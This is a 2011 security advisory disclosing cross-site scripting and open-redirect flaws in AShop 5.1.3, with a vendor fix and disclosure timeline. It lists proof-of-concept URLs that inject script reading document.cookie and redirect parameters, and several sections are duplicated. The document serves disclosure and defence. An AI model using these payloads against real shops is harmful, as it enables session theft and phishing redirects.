INFOSERVE-ADV2011-02 - Multiple security vulnerabilities in AShop
Advisory:
|
Multiple security vulnerabilities in AShop
|
Advisory ID:
|
INFOSERVE-ADV2011-02
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on AShop513
|
Vendor URL:
|
|
Vendor Status:
|
fixed in Version 5.1.4
|
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
AShop is prone to multiple security vulnerabilities
==============
PoC-Exploit
==============
Cross-Site-Scripting
IE8
PoC-Exploit
==============
Cross-Site-Scripting
IE8
http://<target>/ashop/?’"<script>alert(document.cookie)</script>
http://<target>/ashop/index.php?’"<script>alert(document.cookie)</script> http://<target>/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns=" http://<target>/ashop/index.php?language=’"<script>alert(document.cookie)</script> |
FF 7.1
http://<target>/ashop/index.php?searchstring=1&showresult=true&exp=’"</script><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.php&shop=1
http://<target>/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=’"</script><script>alert(document.cookie)</script>&msg= http://<target>/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg=’"</script><script>alert(document.cookie)</script> http://<target>/ashop/basket.php?cat=0&sid=’"</script><script>alert(document.cookie)</script>&shop=1&payoption=3 |
Open Redirection
http://<target>/ashop/language.php?language=sv&redirect=http://www.google.com
http://<target>/ashop/currency.php?currency=aud&redirect=http://www.google.com
http://<target>/ashop/currency.php?redirect=http://www.google.com
http://<target>/ashop/currency.php?currency=aud&redirect=http://www.google.com
http://<target>/ashop/currency.php?redirect=http://www.google.com
=====
Solution:
=====
Upgrade to the latest Version 5.1.4
================
Disclosure Timeline:
================
04-Nov-2011 – informed vendor by contact form
08-Nov-2011 – second contact attempt
09-Nov-2011 – vendor fix
====
Credits:
====
Vulnerabilities found and advisory written by the INFOSERVE Security Team
=======
References:
=======
http://www.ashopsoftware.com/
http://sourceforge.net/projects/ashop/files/
Solution:
=====
Upgrade to the latest Version 5.1.4
================
Disclosure Timeline:
================
04-Nov-2011 – informed vendor by contact form
08-Nov-2011 – second contact attempt
09-Nov-2011 – vendor fix
====
Credits:
====
Vulnerabilities found and advisory written by the INFOSERVE Security Team
=======
References:
=======
http://www.ashopsoftware.com/
http://sourceforge.net/projects/ashop/files/
Comments
Display comments as Linear | Threaded